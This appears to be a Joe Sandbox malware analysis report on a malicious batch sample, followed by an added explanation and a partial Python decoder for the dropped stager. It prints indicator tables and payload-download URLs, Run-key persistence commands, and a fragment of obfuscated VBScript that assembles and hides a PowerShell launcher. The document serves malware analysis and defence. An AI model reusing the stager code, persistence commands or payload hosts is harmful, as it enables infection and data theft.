                https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.google.com | wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                https://ramirex.ro/Rutschebanes.qxdXR | powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://194.59.30.6/UWYVFXQWh32.binB | wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.microso | powershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/ | powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.bin | wab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://194.59.30.6 | powershell.exe, 00000003.00000002.2579735465.0000024A42CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2579735465.0000024A44318000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                https://www.google.com/accounts/servicelogin | wab.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                https://login.yahoo.com/config/login | wab.exe | false | URL Reputation: safe | unknown
                http://www.microsof. | powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.nirsoft.net/ | wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://ramirex.ro | powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004F5E000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                http://www.ebuddy.com | wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                178.215.236.110 | jgbours284hawara02.duckdns.org | Germany | 10753 | LVLT-10753US | true
                137.220.252.40 | www.387mfyr.sbs | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
                194.59.30.6 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false
                37.235.104.9 | led-svitidla.eu | Czech Republic | 39392 | SUPERNETWORK_CZ | false
                188.215.50.15 | ramirex.ro | Romania | 34358 | WEBCLASSITRO | false
                178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                Joe Sandbox version: 40.0.0 Tourmaline
                Analysis ID: 1449968
                Start date and time: 2024-05-31 08:08:08 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 11m 15s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 33
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat (renamed because original name is a hash value)
                Original Sample Name: MATALJ Kft Rendels H634667478874873845985309802Thayne.bat
                Detection: MAL
                Classification: mal100.phis.troj.spyw.expl.evad.winBAT@47/20@7/6
                EGA Information:
                • Successful, ratio: 62.5%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 173
                • Number of non-executed functions: 299
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 2084 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 4972 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 504 because it is empty
                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes were analyzed; the report is missing behavior information.
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                Time | Type | Description
                02:09:03 | API Interceptor | 210x Sleep call for process: powershell.exe modified
                02:09:20 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
                02:10:09 | API Interceptor | 296475x Sleep call for process: wab.exe modified
                08:09:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Argumentlistens %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)
                08:09:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Argumentlistens %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)
                08:10:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LZ0PTDW C:\Program Files (x86)\windows mail\wab.exe
                08:10:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LZ0PTDW C:\Program Files (x86)\windows mail\wab.exe
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
178.215.236.110
  IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbs | malicious | GuLoader, Remcos
  MST-004875758845993858358838583853534353loadinzormuleringse.exe | malicious | Remcos
  rSMKGKZ757385839500358358935775939058735Repoll.exe | malicious | GuLoader, Remcos
  SKMFTTEHRAN665757754757758689949688445454Ordn.exe | malicious | GuLoader, Remcos
137.220.252.40
  ZAM#U00d3WIENIE_NR.2405073.exe | malicious | DBatLoader, FormBook | www.387mfyr.sbs/8cgp/
  Company profile.pif.exe | malicious | FormBook, PureLog Stealer | www.387mfyr.sbs/wu8v/
  NdYuOgHbM9.exe | malicious | FormBook | www.387mfyr.sbs/wu8v/
  SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exe | malicious | FormBook | www.387mfyr.sbs/wu8v/
  COMPANY PROFILE.exe | malicious | FormBook, PureLog Stealer | www.387mfyr.sbs/wu8v/
  BM-FM_NR.24040718PDF.exe | malicious | FormBook, GuLoader | www.387mfyr.sbs/8cgp/
37.235.104.9
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader | www.led-svitidla.eu/abt9/
  RFQ0240515.XLS.bat.exe | malicious | FormBook | www.led-svitidla.eu/tkc9/
188.215.50.15
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader
  IMG-35235235523525235252532535Selvfinansieret.vbs | malicious | GuLoader
178.237.33.50
  temp2.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
  QUOTE-PDF.exe | malicious | Remcos | geoplugin.net/json.gp
  https://github.com/hmrc/claim-tax-refund/files/15487332/TaxrefundlistPDF.zip | malicious | Remcos | geoplugin.net/json.gp
  SWIFT DOZNAKA RADIJATOR-INZENJERING DOO EUR 19588,22 20240529142528.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
  shipping document.js | malicious | DBatLoader, Remcos | geoplugin.net/json.gp
  Whatsapp-IMG-87383-0001.xls | malicious | Remcos | geoplugin.net/json.gp
  ce780b54c89a5fe2c0fe7fa6ff246b00ca4e15ee84b80c4d6730f30f345912ed_dump.exe | malicious | Remcos | geoplugin.net/json.gp
  E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd | malicious | DBatLoader, Remcos | geoplugin.net/json.gp
  DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
  DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context
jgbours284hawara02.duckdns.org
  IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbs | malicious | GuLoader, Remcos | 178.215.236.110
  MST-004875758845993858358838583853534353loadinzormuleringse.exe | malicious | Remcos | 178.215.236.110
  rSMKGKZ757385839500358358935775939058735Repoll.exe | malicious | GuLoader, Remcos | 178.215.236.110
  SKMFTTEHRAN665757754757758689949688445454Ordn.exe | malicious | GuLoader, Remcos | 178.215.236.110
  Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 45.88.90.110
  PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 45.88.90.110
  doc.bat | malicious | GuLoader, Remcos | 45.88.90.110
ramirex.ro
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader | 188.215.50.15
  IMG-35235235523525235252532535Selvfinansieret.vbs | malicious | GuLoader | 188.215.50.15
geoplugin.net
  temp2.vbs | malicious | Remcos, GuLoader | 178.237.33.50
  QUOTE-PDF.exe | malicious | Remcos | 178.237.33.50
  https://github.com/hmrc/claim-tax-refund/files/15487332/TaxrefundlistPDF.zip | malicious | Remcos | 178.237.33.50
  SWIFT DOZNAKA RADIJATOR-INZENJERING DOO EUR 19588,22 20240529142528.vbs | malicious | Remcos, GuLoader | 178.237.33.50
  shipping document.js | malicious | DBatLoader, Remcos | 178.237.33.50
  Whatsapp-IMG-87383-0001.xls | malicious | Remcos | 178.237.33.50
  ce780b54c89a5fe2c0fe7fa6ff246b00ca4e15ee84b80c4d6730f30f345912ed_dump.exe | malicious | Remcos | 178.237.33.50
  E-Advice-Outward Remittance AOBFTT29052024866750_PDF.cmd | malicious | DBatLoader, Remcos | 178.237.33.50
  DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | 178.237.33.50
  DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | 178.237.33.50
www.387mfyr.sbs
  Factura 02297-23042024.exe | malicious | FormBook, GuLoader | 137.220.252.40
  anebilledes.exe | malicious | FormBook, GuLoader | 137.220.252.40
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader | 137.220.252.40
  ZAM#U00d3WIENIE_NR.2405073.exe | malicious | DBatLoader, FormBook | 137.220.252.40
  Company profile.pif.exe | malicious | FormBook, PureLog Stealer | 137.220.252.40
  NdYuOgHbM9.exe | malicious | FormBook | 137.220.252.40
  SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exe | malicious | FormBook | 137.220.252.40
  COMPANY PROFILE.exe | malicious | FormBook, PureLog Stealer | 137.220.252.40
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 137.220.252.40
  BM-FM_NR.24040718PDF.exe | malicious | FormBook, GuLoader | 137.220.252.40
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
LVLT-10753US
  Due Invoice pdf.exe | malicious | AgentTesla, PureLog Stealer, XWorm | 178.215.236.251
  bot.arm5-20240528-2109.elf | malicious | Mirai, Moobot | 168.215.38.24
  6a7R9UXFMM.elf | malicious | Mirai | 94.154.174.117
  fZUVfiCmaP.elf | malicious | Mirai | 147.207.148.212
  Doc0781123608.exe | malicious | AgentTesla, PureLog Stealer, XWorm | 178.215.236.251
  Stien.exe | malicious | PureLog Stealer, zgRAT | 94.154.172.166
  SKXNyy0UdE.elf | malicious | Unknown | 178.215.236.101
  IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbs | malicious | GuLoader, Remcos | 178.215.236.110
  CGemi3cruu.elf | malicious | Mirai | 148.57.27.158
  bnJSH0V4Je.elf | malicious | Mirai | 168.215.26.45
COMBAHTONcombahtonGmbHDE
  https://www.yumpu.com/en/document/read/68712704/view-and-print-online-confidential-doc-98372-6-3-2 | malicious | HTMLPhisher | 45.153.241.110
  https://f2677811-d05a-4238-803b-e963ee14674b.inwise.net/Page_5-27-2024_3 | malicious | HTMLPhisher | 45.153.242.162
  ypSJ08slSB.exe | malicious | AsyncRAT | 194.59.31.74
  OSE - PO & FCST - ___-LT24052303183991-01.exe | malicious | Remcos | 194.59.31.54
  https://url12.mailanyone.net/scanner?m=1s97Ju-0007cP-5W&d=4%7Cmail%2F90%2F1716228000%2F1s97Ju-0007cP-5W%7Cin12g%7C57e1b682%7C11949542%7C14589158%7C664B8FE646C773D5644A5A16205D613D&o=%2Fphti%3A%2Fitsc3e4rnc.1bu&s=WFgXHfph-aCfQ3HNg6dfjLZSkk4 | malicious | Unknown | 160.20.145.170
  dhl_awb_shipping_invoice_21_05_2024_000000000000024.exe | malicious | GuLoader, Remcos | 194.59.31.149
  file.exe | malicious | Socks5Systemz | 194.59.31.219
  https://url12.mailanyone.net/scanner?m=1s97Wg-0007OG-5w&d=4%7Cmail%2F90%2F1716228600%2F1s97Wg-0007OG-5w%7Cin12e%7C57e1b682%7C11949542%7C14589158%7C664B92FE7E7733B9B01FA361DA6487AF&o=%2Fphta%3A%2Fstspgiexou.nrP.srxp%2FMvjV7dvygwS7x%2FizWOqqG&s=2zn5SGraXgtNWi1MOGGJ5ZmUbDQ | malicious | Unknown | 160.20.145.170
  jXBjxhHQgR.exe | malicious | CMSBrute | 45.141.57.69
  email legit check.eml | malicious | HTMLPhisher | 194.59.31.166
BCPL-SGBGPNETGlobalASNSG
  http://spshoesx.top/ | malicious | Unknown | 137.220.146.63
  http://login.aeosaen.top/ | malicious | Unknown | 27.124.47.217
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader | 137.220.252.40
  x64.nn.elf | malicious | Mirai | 137.220.223.49
  PDF89gh ReUrgent Quotepdf.exe | malicious | FormBook | 1.32.254.242
  Product Listsd#U0334r#U0334o#U0334w#U0334..exe | malicious | FormBook | 1.32.254.242
  https://aeno.co.jp.yc-zg.com/aeon | malicious | Unknown | 137.220.217.132
  https://aeno.co.jp.slksg.com/aeon | malicious | Unknown | 137.220.217.132
  https://aeno.co.jp.xianchui.net/aeon | malicious | Unknown | 137.220.217.132
  https://bituotools.com/ | malicious | Unknown | 118.107.57.6
SUPERNETWORK_CZ
  IMG-466573885783553Folketingsmedlemmers.vbs | malicious | FormBook, GuLoader | 37.235.104.9
  RFQ0240515.XLS.bat.exe | malicious | FormBook | 37.235.104.9
  https://filetransfer.io/data-package/LGjfkuMP/download | malicious | Unknown | 46.234.105.221
  x607DB0i08.exe | malicious | Pushdo | 88.86.118.82
  x7RlIzQDk1.exe | malicious | Unknown | 88.86.118.82
  EwK95WVtzI.exe | malicious | Pushdo | 88.86.118.82
  https://26355.wexbo.com/files/other/pcm_company.pdf | malicious | HTMLPhisher | 95.168.193.75
  CX17SY6xF6.exe | malicious | Pushdo | 88.86.118.82
  Planilhas.xlsx.com.exe | malicious | Unknown | 46.234.108.120
  ryidtyjrh | malicious | Unknown | 88.86.109.239
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e
  SOA APR-MAY 2024.exe | malicious | AgentTesla | 188.215.50.15
  Swift Copy.exe | malicious | AgentTesla | 188.215.50.15
  ajb5QcGVGK.exe | malicious | DCRat | 188.215.50.15
  Application.jar | malicious | Unknown | 188.215.50.15
  Application.jar | malicious | Unknown | 188.215.50.15
  http://nickcrossley.online | malicious | Unknown | 188.215.50.15
  ProductsInquiries#VN8399938.exe | malicious | Unknown | 188.215.50.15
  ProductsInquiries#VN8399938.exe | malicious | Unknown | 188.215.50.15
  http://sekij22.pages.dev/ | malicious | Unknown | 188.215.50.15
  http://arabasiastarzzfcontest.pages.dev/ | malicious | Unknown | 188.215.50.15
37f463bf4616ecd445d4a1937da06e19
  SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exe | malicious | LummaC | 188.215.50.15
  temp2.vbs | malicious | GuLoader | 188.215.50.15
  temp2.vbs | malicious | Remcos, GuLoader | 188.215.50.15
  file.exe | malicious | Vidar | 188.215.50.15
  Unspuriousness.exe | malicious | FormBook, GuLoader | 188.215.50.15
  ffff6f6.msi | malicious | Unknown | 188.215.50.15
  detalle_transferencia_2024-05-13T064143.173 0200_3049280002017526_PDF.exe | malicious | GuLoader | 188.215.50.15
  Kompagnonernes.exe | malicious | GuLoader | 188.215.50.15
  Factura 02297-23042024.exe | malicious | FormBook, GuLoader | 188.215.50.15
  anebilledes.exe | malicious | FormBook, GuLoader | 188.215.50.15
                            No context
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):963
                            Entropy (8bit):5.017637342004999
                            Encrypted:false
                            SSDEEP:12:tkluand6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qluWdVauKyGX85jvXhNlT3/7AcV9Wro
                            MD5:AE4FB899AF4F8667F2D6BC92629493D6
                            SHA1:860CF64EA386F6EF62EE25A7DC8888014A638F4E
                            SHA-256:A8F0C5A72BA646EDA416B116DFCDC56C3C3BAE23680D59FF57292DD45D1F4F6D
                            SHA-512:39945A1C024D7DF88FFB6E59F94408C6853780D4F9E7A039BD38ED2C9567D6B8694CEE3AA45FAD410B2F81801FC9FA5AA73FE23206EED4E9D7133FA2B6B38BC3
                            Malicious:false
                            Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):11608
                            Entropy (8bit):4.8908305915084105
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                            MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                            SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                            SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                            SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1412
                            Entropy (8bit):5.432884047112001
                            Encrypted:false
                            SSDEEP:24:35z1WSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NK3R8CiagUMEOsr:bWSU4xympjmZ9tz4RIoUl8NWR8CN/Osr
                            MD5:D0EA630B4B6FEA6C29DFD60AD83C38F9
                            SHA1:9EF69D0F56C592A2453DF10B2A56EFE7D156925E
                            SHA-256:8E374A57F84137E72B7D6F8A6F9D68A4C4D3CCF1BEA0B2147600992C8884F45B
                            SHA-512:AD2DCAE5027EBDCC9AE7B23F91777C8E88F8F4DC510D8DBD0514D17707F0168EDF274E93587AA130497990FCEE9F6FBAD360F0DC0040AAB45A84FD2CDE067F75
                            Malicious:false
                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):23279
                            Entropy (8bit):4.490790706855259
                            Encrypted:false
                            SSDEEP:192:fHVW7MVf7LLWZQxF9KFJLT26jSqtWiLPfEvF4QQT7X2SVIkVSUfZKB5xjOzv245i:fHg77tTah5T2zNXMHP+6I8iu5pVv
                            MD5:A472C1FAFA3F44CE68133628D501E66D
                            SHA1:635B1915F0C2B4718627CFB52ABC9A987DDA7794
                            SHA-256:26BA9CB14985A79E8F92CCE91824AADE3F878635BD48559376CB86CC814C8C2F
                            SHA-512:FAFE39F7A8DA3147EF071765A88ECEC2B2F29E2EB9A73B4A326B972BB5999A104E56067D93AF0A8905E30DCF12964DC4D6ADD5AF771B32D7580D14513A31A80A
                            Malicious:true
                            Preview:.. ......Function Benzantialdoxime(Farestierne)....Benzantialdoxime = ChrW(Farestierne)....End Function .... ..Skittling = 0.... ..Surfacing= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....Ar6 = Standpatism .... ..Dim Brefrekvens.... ..for Distributary=0 to ubound(Surfacing).. .. ...Systembemrkninger = Systembemrkninger & Benzantialdoxime(Surfacing(Distributary)+10).. .. ..Next....Call Unriveting ..........Messingdr20 = Systembemrkninger & " " & Benzantialdoxime(34) & Ar6 & Benzantialdoxime(34)......Call CreateObject("Wscript.Shell").Run( Messingdr20,Skittling)........Function Unriveting ......Ar6 = Ar6 & "$Radi"..Ar6 = Ar6 & "osender"..Ar6 = Ar6 & "='Sub';"..Ar6 = Ar6 & "$Radios"..Ar6 = Ar6 & "ender+='"..Ar6 = Ar6 & "strin';"..Ar6 = Ar6 & "$Knnest "..Ar6 = Ar6 & "= 1;$Rad"..Ar6 = Ar6 & "iosender+"..Ar6 = Ar6 & "='g';Fu"..Ar6 = Ar6 & "nction "..Ar6 = Ar6 & "Beshout($"..Ar6 = Ar6 & "Soluren"..Ar6 = Ar6 & "es){$St"..Ar6 = Ar6 & "rejft"..Ar6 = Ar6 & "ogters=$S"..Ar6 = Ar6 & "olure".
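The preview above shows the whole trick of this dropped stager. `Surfacing` is an integer array; the loop adds 10 to each element and passes it through `ChrW`, which spells the launcher (it decodes to POWERSHELL). `Unriveting` then builds the PowerShell payload in `Ar6` from short string fragments, so that no single line contains a recognisable keyword (note how `Substring` is spelt as `'Sub'`, `'strin'` and `'g'`), wraps it in `ChrW(34)` quotes and hands the result to `WScript.Shell.Run` with `Skittling = 0`, a hidden window. The script below is an added worked decoder, not part of this report and not Joe Sandbox code, that recovers those pieces from the preview text as constructed inline; because the report's preview is cut off, it can only recover the payload up to where the preview stops, and the regular expressions are written for this script's shape rather than for VBScript in general.

```python
"""Undo the two layers of obfuscation in the VBScript stager dropped by
wab.exe: the integer array that is shifted and fed to ChrW to spell the
launcher, and the PowerShell payload assembled from short fragments
appended to Ar6 one statement at a time.
"""
import re

# Constructed input: the Preview of the dropped .vbs as printed in this
# report. The preview renders CR/LF as '.' and is cut off, so the decoded
# payload is only as long as what the report shows.
VBS_PREVIEW = r'''Function Benzantialdoxime(Farestierne)....Benzantialdoxime = ChrW(Farestierne)....End Function .... ..Skittling = 0.... ..Surfacing= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....Ar6 = Standpatism .... ..Dim Brefrekvens.... ..for Distributary=0 to ubound(Surfacing).. .. ...Systembemrkninger = Systembemrkninger & Benzantialdoxime(Surfacing(Distributary)+10).. .. ..Next....Call Unriveting ..........Messingdr20 = Systembemrkninger & " " & Benzantialdoxime(34) & Ar6 & Benzantialdoxime(34)......Call CreateObject("Wscript.Shell").Run( Messingdr20,Skittling)........Function Unriveting ......Ar6 = Ar6 & "$Radi"..Ar6 = Ar6 & "osender"..Ar6 = Ar6 & "='Sub';"..Ar6 = Ar6 & "$Radios"..Ar6 = Ar6 & "ender+='"..Ar6 = Ar6 & "strin';"..Ar6 = Ar6 & "$Knnest "..Ar6 = Ar6 & "= 1;$Rad"..Ar6 = Ar6 & "iosender+"..Ar6 = Ar6 & "='g';Fu"..Ar6 = Ar6 & "nction "..Ar6 = Ar6 & "Beshout($"..Ar6 = Ar6 & "Soluren"..Ar6 = Ar6 & "es){$St"..Ar6 = Ar6 & "rejft"..Ar6 = Ar6 & "ogters=$S"..Ar6 = Ar6 & "olure"'''


def _int_expr(expr):
    """Evaluate the small +/- integer expressions obfuscators put inside
    array(...) (e.g. 71-1+0) without reaching for eval."""
    if not re.fullmatch(r"\s*[+-]?\d+(?:\s*[+-]\s*\d+)*\s*", expr):
        raise ValueError(f"unsupported expression: {expr!r}")
    return sum(-int(n) if s == "-" else int(n)
               for s, n in re.findall(r"([+-]?)\s*(\d+)", expr))


def find_offset(script):
    """The loop adds a constant to every element: Name(Array(i)+10)."""
    m = re.search(r"\(\s*\w+\s*\(\s*\w+\s*\)\s*([+-]\s*\d+)\s*\)", script)
    return _int_expr(m.group(1)) if m else 0


def decode_char_array(script, offset):
    """Turn the array(...) literal into text after applying the offset."""
    m = re.search(r"array\(([^)]*)\)", script, re.I)
    if not m:
        raise ValueError("no array(...) literal found")
    return "".join(chr(_int_expr(x) + offset) for x in m.group(1).split(","))


def collect_fragments(script, var="Ar6"):
    """Reassemble a string built by repeated  var = var & "..."  statements."""
    rx = re.compile(rf'{var}\s*=\s*{var}\s*&\s*"((?:[^"]|"")*)"')
    return "".join(m.group(1).replace('""', '"') for m in rx.finditer(script))


def window_style(script):
    """Second argument of WScript.Shell.Run; 0 keeps the window hidden."""
    m = re.search(r"\.Run\(\s*\w+\s*,\s*(\w+)\s*\)", script, re.I)
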